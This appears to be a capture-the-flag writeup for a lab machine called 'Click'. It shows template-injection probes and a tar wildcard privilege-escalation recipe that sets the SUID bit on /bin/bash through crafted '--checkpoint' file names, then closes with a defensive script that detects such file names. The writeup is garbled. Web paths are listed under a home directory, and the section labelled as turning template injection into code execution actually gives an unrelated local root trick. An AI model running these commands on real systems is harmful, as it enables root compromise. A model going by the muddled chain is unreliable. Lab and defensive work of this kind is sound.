Click HTB Writeup

In /home/click:

/login
/dashboard
/forgot-password
/test

The /test endpoint is promising.

Discovering SSTI

The /test endpoint accepts a parameter ?name=. Submitting {{7*7}} returns 49 in the response → Server-Side Template Injection (Jinja2).

Confirming Execution

Payload: {{ config }} → Leaks Flask configuration, confirming Jinja2.

Gaining RCE

Jinja2 SSTI to RCE:

echo "#!/bin/bash" > shell.sh
echo "chmod u+s /bin/bash" >> shell.sh
touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=sh shell.sh"

When the backup runs (likely via cron as root), tar executes shell.sh, giving /bin/bash SUID.

Wait for cron (or run backup manually if possible), then: tar executes shell.sh
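
On the defensive side, the tar step above depends on the backup job letting the shell expand file names into tar's argument list. The following is an added example, not part of the original writeup, that checks a backup directory for option-like names and archives it without a wildcard. It assumes the job runs tar with an unquoted `*`; the function names and paths are hypothetical.

```shell
#!/bin/sh
# Added example: audit and harden a tar-based backup job.
# The source directory and archive path passed in are hypothetical;
# the page does not give the real backup command.

# Print entries directly inside DIR whose names start with '-'.
# When a job runs `tar ... *` in DIR, the shell expands these names into
# tar's argv and tar parses them as options rather than as files.
find_option_like_names() {
    find "$1" -mindepth 1 -maxdepth 1 -name '-*' -print
}

# Hardened backup: refuse to run if option-like names are present, and
# archive via `-C DIR .` so no file name is ever placed on the command line.
safe_backup() {
    src=$1
    out=$2
    hits=$(find_option_like_names "$src")
    if [ -n "$hits" ]; then
        printf 'refusing backup of %s, option-like names found:\n%s\n' \
            "$src" "$hits" >&2
        return 1
    fi
    tar -cf "$out" -C "$src" .
}
```

Running `find_option_like_names` on a schedule against any directory that unprivileged users can write to and root jobs read from gives an early signal, and a SUID bit appearing on /bin/bash is worth alerting on separately.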